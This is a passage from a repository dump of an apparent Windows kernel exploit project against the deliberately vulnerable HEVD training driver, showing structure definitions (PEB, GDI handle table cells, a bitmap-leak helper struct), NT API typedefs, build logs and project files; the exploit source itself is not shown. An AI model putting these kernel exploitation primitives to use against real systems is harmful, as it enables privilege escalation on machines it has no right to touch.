82 | ULONG ProcessInitializing : 1;
83 | ULONG ProcessUsingVEH : 1;
84 | ULONG ProcessUsingVCH : 1;
85 | ULONG ProcessUsingFTH : 1;
86 | ULONG ReservedBits0 : 27;
87 | };
88 | ULONG EnvironmentUpdateCount;
89 | };
90 | union
91 | {
92 | PVOID KernelCallbackTable;
93 | PVOID UserSharedInfoPtr;
94 | };
95 | ULONG SystemReserved[1];
96 | ULONG AtlThunkSListPtr32;
97 | PVOID ApiSetMap;
98 | ULONG TlsExpansionCounter;
99 | PVOID TlsBitmap;
100 | ULONG TlsBitmapBits[2];
101 | PVOID ReadOnlySharedMemoryBase;
102 | PVOID HotpatchInformation;
103 | PVOID *ReadOnlyStaticServerData;
104 | PVOID AnsiCodePageData;
105 | PVOID OemCodePageData;
106 | PVOID UnicodeCaseTableData;
107 |
108 | ULONG NumberOfProcessors;
109 | ULONG NtGlobalFlag;
110 |
111 | LARGE_INTEGER CriticalSectionTimeout;
112 | SIZE_T HeapSegmentReserve;
113 | SIZE_T HeapSegmentCommit;
114 | SIZE_T HeapDeCommitTotalFreeThreshold;
115 | SIZE_T HeapDeCommitFreeBlockThreshold;
116 |
117 | ULONG NumberOfHeaps;
118 | ULONG MaximumNumberOfHeaps;
119 | PVOID *ProcessHeaps;
120 |
121 | PVOID GdiSharedHandleTable;
122 | } PEB, *PPEB;
123 |
124 | typedef struct _GDICELL {
125 | LPVOID pKernelAddress;
126 | USHORT wProcessId;
127 | USHORT wCount;
128 | USHORT wUpper;
129 | USHORT wType;
130 | LPVOID pUserAddress;
131 | } GDICELL, *PGDICELL;
132 |
133 | typedef struct _SERVERINFO {
134 | DWORD dwSRVIFlags;
135 | DWORD cHandleEntries;
136 | WORD wSRVIFlags;
137 | WORD wRIPPID;
138 | WORD wRIPError;
139 | } SERVERINFO, *PSERVERINFO;
140 |
141 | typedef struct _USER_HANDLE_ENTRY {
142 | void *pKernel;
143 | union
144 | {
145 | PVOID pi;
146 | PVOID pti;
147 | PVOID ppi;
148 | };
149 | BYTE type;
150 | BYTE flags;
151 | WORD generation;
152 | } USER_HANDLE_ENTRY, *PUSER_HANDLE_ENTRY;
153 |
154 | typedef struct _SHAREDINFO {
155 | PSERVERINFO psi;
156 | PUSER_HANDLE_ENTRY aheList;
157 | ULONG HeEntrySize;
158 | ULONG_PTR pDispInfo;
159 | ULONG_PTR ulSharedDelts;
160 | ULONG_PTR awmControl;
161 | ULONG_PTR DefWindowMsgs;
162 | ULONG_PTR DefWindowSpecMsgs;
163 | } SHAREDINFO, *PSHAREDINFO;
164 |
165 | typedef struct _LeakBitmapInfo {
166 | HBITMAP hBitmap;
167 | PUCHAR pBitmapPvScan0;
168 | } LeakBitmapInfo, *pLeakBitmapInfo;
169 |
170 | typedef NTSTATUS(NTAPI *_NtQuerySystemInformation)(
171 | SYSTEM_INFORMATION_CLASS SystemInformationClass,
172 | PVOID SystemInformation,
173 | ULONG SystemInformationLength,
174 | PULONG ReturnLength
175 | );
176 |
177 | typedef NTSTATUS(NTAPI *_RtlGetVersion)(
178 | LPOSVERSIONINFOEXW lpVersionInformation
179 | );
180 |
181 | typedef NTSTATUS (WINAPI *_NtQueryInformationProcess)(
182 | HANDLE ProcessHandle,
183 | DWORD ProcessInformationClass,
184 | PVOID ProcessInformation,
185 | DWORD ProcessInformationLength,
186 | PDWORD ReturnLength
187 | );
188 |
189 | typedef NTSTATUS WINAPI NtAllocateVirtualMemory_t(IN HANDLE ProcessHandle,
190 | IN OUT PVOID *BaseAddress,
191 | IN ULONG ZeroBits,
192 | IN OUT PULONG AllocationSize,
193 | IN ULONG AllocationType,
194 | IN ULONG Protect);
195 |
196 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/CL.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/CL.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/HEVD_Stop_By_Win10.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/HEVD_Stop_By_Win10.obj
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\RELEASE\STOP_BY_WIN10.EXE
2 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\RELEASE\STOP_BY_WIN10.PDB
3 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\cl.command.1.tlog
4 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\CL.read.1.tlog
5 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\CL.write.1.tlog
6 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\STOP_BY_WIN10\RELEASE\HEVD_STOP_BY_WIN10.OBJ
7 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\link.command.1.tlog
8 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\link.read.1.tlog
9 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\link.write.1.tlog
10 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\mt.command.1.tlog
11 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\mt.read.1.tlog
12 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\mt.write.1.tlog
13 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\STOP_BY_WIN10\RELEASE\STOP_BY_WIN10.EXE.INTERMEDIATE.MANIFEST
14 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\Stop_by_win10.write.1.tlog
15 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\STOP_BY_WIN10\RELEASE\VC100.PDB
16 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.lastbuildstate:
--------------------------------------------------------------------------------
1 | #v4.0:v100
2 | Release|Win32|C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\|
3 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.log:
--------------------------------------------------------------------------------
1 | Build started 2/24/2017 6:32:30 AM.
2 | Project "C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Stop_by_win10.vcxproj" on node 2 (rebuild target(s)).
3 | _PrepareForClean:
4 | Deleting file "Release\Stop_by_win10.lastbuildstate".
5 | InitializeBuildStatus:
6 | Creating "Release\Stop_by_win10.unsuccessfulbuild" because "AlwaysCreate" was specified.
7 | ClCompile:
8 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\CL.exe /c /Zi /nologo /W3 /WX- /O2 /Oi /Oy- /GL /D WIN32 /D NDEBUG /D _CONSOLE /D _UNICODE /D UNICODE /Gm- /EHsc /MD /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"Release\\" /Fd"Release\vc100.pdb" /Gd /TC /analyze- /errorReport:prompt HEVD_Stop_By_Win10.c
9 | HEVD_Stop_By_Win10.c
10 | HEVD_Stop_By_Win10.c(52): warning C4013: 'NtGdiDdDDICreateAllocation' undefined; assuming extern returning int
11 | HEVD_Stop_By_Win10.c(346): warning C4047: 'initializing' : 'PVOID' differs in levels of indirection from 'int'
12 | HEVD_Stop_By_Win10.c(652): warning C4244: '+=' : conversion from 'double' to 'long', possible loss of data
13 | HEVD_Stop_By_Win10.c(656): warning C4244: '+=' : conversion from 'double' to 'long', possible loss of data
14 | HEVD_Stop_By_Win10.c(330): warning C4101: 'dwResult' : unreferenced local variable
15 | Link:
16 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\link.exe /ERRORREPORT:PROMPT /OUT:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Release\Stop_by_win10.exe" /INCREMENTAL:NO /NOLOGO kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /MANIFEST /ManifestFile:"Release\Stop_by_win10.exe.intermediate.manifest" /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG /PDB:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Release\Stop_by_win10.pdb" /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Release\Stop_by_win10.lib" /MACHINE:X86 Release\HEVD_Stop_By_Win10.obj
17 | HEVD_Stop_By_Win10.obj : error LNK2001: unresolved external symbol _NtGdiDdDDICreateAllocation
18 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Release\Stop_by_win10.exe : fatal error LNK1120: 1 unresolved externals
19 | C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\Platforms\Win32\Microsoft.Cpp.Win32.Targets(268,5): error MSB6006: "link.exe" exited with code 1120.
20 | Done Building Project "C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Stop_by_win10.vcxproj" (rebuild target(s)) -- FAILED.
21 |
22 | Build FAILED.
23 |
24 | Time Elapsed 00:00:02.07
25 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.unsuccessfulbuild
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/cl.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/cl.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/vc100.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/vc100.pdb
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Stop_By_Win10.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 |
7 | int main(int argc ,char *argv[])
8 | {
9 | printf("\t\t[+] ");
10 | return 0;
11 | }
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Stop_by_win10.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {680F7C84-6509-4642-93B3-FE631C50EA12}
23 | Win32Proj
24 | Stop_by_win10
25 |
26 |
27 |
28 | Application
29 | true
30 | Unicode
31 |
32 |
33 | Application
34 | true
35 | Unicode
36 |
37 |
38 | Application
39 | false
40 | true
41 | Unicode
42 |
43 |
44 | Application
45 | false
46 | true
47 | Unicode
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 | true
67 |
68 |
69 | true
70 |
71 |
72 | false
73 |
74 |
75 | false
76 |
77 |
78 |
79 |
80 |
81 | Level3
82 | Disabled
83 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
84 |
85 |
86 | Console
87 | true
88 |
89 |
90 |
91 |
92 |
93 |
94 | Level3
95 | Disabled
96 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
97 |
98 |
99 | Console
100 | true
101 |
102 |
103 |
104 |
105 | Level3
106 |
107 |
108 | MaxSpeed
109 | true
110 | true
111 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
112 |
113 |
114 | Console
115 | true
116 | true
117 | true
118 |
119 |
120 |
121 |
122 | Level3
123 |
124 |
125 | MaxSpeed
126 | true
127 | true
128 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
129 |
130 |
131 | Console
132 | true
133 | true
134 | true
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 | Document
146 | ml64 /c %(filename).asm
147 | %(filename).obj
148 |
149 |
150 |
151 |
152 |
153 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Stop_by_win10.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Source Files
30 |
31 |
32 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Stop_by_win10.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/_debugbreak.asm:
--------------------------------------------------------------------------------
1 | .CODE
2 |
3 | Int_3 PROC
4 | int 3
5 | ret
6 | Int_3 ENDP
7 |
8 | END
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/_debugbreak.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/_debugbreak.obj
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/CL.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/CL.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/HEVD_Stop_By_Win10.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/HEVD_Stop_By_Win10.obj
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\STOP_BY_WIN10\_DEBUGBREAK.OBJ
2 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\cl.command.1.tlog
3 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\CL.read.1.tlog
4 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\CL.write.1.tlog
5 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\custombuild.command.1.tlog
6 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\custombuild.read.1.tlog
7 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\custombuild.write.1.tlog
8 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\STOP_BY_WIN10\X64\RELEASE\HEVD_STOP_BY_WIN10.OBJ
9 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\link.command.1.tlog
10 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\link.read.1.tlog
11 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\link.write.1.tlog
12 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\mt.command.1.tlog
13 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\mt.read.1.tlog
14 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\mt.write.1.tlog
15 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\STOP_BY_WIN10\X64\RELEASE\STOP_BY_WIN10.EXE.INTERMEDIATE.MANIFEST
16 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\Stop_by_win10.write.1.tlog
17 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\STOP_BY_WIN10\X64\RELEASE\VC100.PDB
18 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\X64\RELEASE\STOP_BY_WIN10.EXE
19 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\X64\RELEASE\STOP_BY_WIN10.PDB
20 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.lastbuildstate:
--------------------------------------------------------------------------------
1 | #v4.0:v100
2 | Release|x64|C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\|
3 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.log:
--------------------------------------------------------------------------------
1 | Build started 2/23/2017 10:23:17 AM.
2 | Project "C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\Stop_by_win10.vcxproj" on node 2 (rebuild target(s)).
3 | _PrepareForClean:
4 | Deleting file "x64\Release\Stop_by_win10.lastbuildstate".
5 | InitializeBuildStatus:
6 | Creating "x64\Release\Stop_by_win10.unsuccessfulbuild" because "AlwaysCreate" was specified.
7 | CustomBuild:
8 | Performing Custom Build Tools
9 | Assembling: _debugbreak.asm
10 | Microsoft (R) Macro Assembler (x64) Version 10.00.30319.01
11 | Copyright (C) Microsoft Corporation. All rights reserved.
12 |
13 | ClCompile:
14 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\x86_amd64\CL.exe /c /Zi /nologo /W3 /WX- /O2 /Oi /GL /D WIN32 /D NDEBUG /D _CONSOLE /D _UNICODE /D UNICODE /Gm- /EHsc /MD /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"x64\Release\\" /Fd"x64\Release\vc100.pdb" /Gd /TC /errorReport:prompt HEVD_Stop_By_Win10.c
15 | HEVD_Stop_By_Win10.c
16 | HEVD_Stop_By_Win10.c(57): warning C4013: 'Int_3' undefined; assuming extern returning int
17 | HEVD_Stop_By_Win10.c(58): warning C4022: 'VirtualAlloc' : pointer mismatch for actual parameter 1
18 | HEVD_Stop_By_Win10.c(349): warning C4047: 'initializing' : 'PVOID' differs in levels of indirection from '__int64'
19 | HEVD_Stop_By_Win10.c(350): warning C4047: 'initializing' : 'PVOID' differs in levels of indirection from '__int64'
20 | HEVD_Stop_By_Win10.c(652): warning C4244: '+=' : conversion from 'double' to '__int64', possible loss of data
21 | HEVD_Stop_By_Win10.c(656): warning C4244: '+=' : conversion from 'double' to '__int64', possible loss of data
22 | HEVD_Stop_By_Win10.c(671): warning C4133: 'function' : incompatible types - from 'SIZE_T *' to 'PULONG'
23 | Link:
24 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\x86_amd64\link.exe /ERRORREPORT:PROMPT /OUT:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.exe" /INCREMENTAL:NO /NOLOGO kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /MANIFEST /ManifestFile:"x64\Release\Stop_by_win10.exe.intermediate.manifest" /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG /PDB:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.pdb" /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.lib" /MACHINE:X64 _debugbreak.obj
25 | x64\Release\HEVD_Stop_By_Win10.obj
26 | Generating code
27 | Finished generating code
28 | Stop_by_win10.vcxproj -> C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.exe
29 | Manifest:
30 | C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\mt.exe /nologo /verbose /outputresource:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.exe;#1" /manifest x64\Release\Stop_by_win10.exe.intermediate.manifest
31 | FinalizeBuildStatus:
32 | Deleting file "x64\Release\Stop_by_win10.unsuccessfulbuild".
33 | Touching "x64\Release\Stop_by_win10.lastbuildstate".
34 | Done Building Project "C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\Stop_by_win10.vcxproj" (rebuild target(s)).
35 |
36 | Build succeeded.
37 |
38 | Time Elapsed 00:00:00.56
39 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/cl.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/cl.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.write.1.tlog:
--------------------------------------------------------------------------------
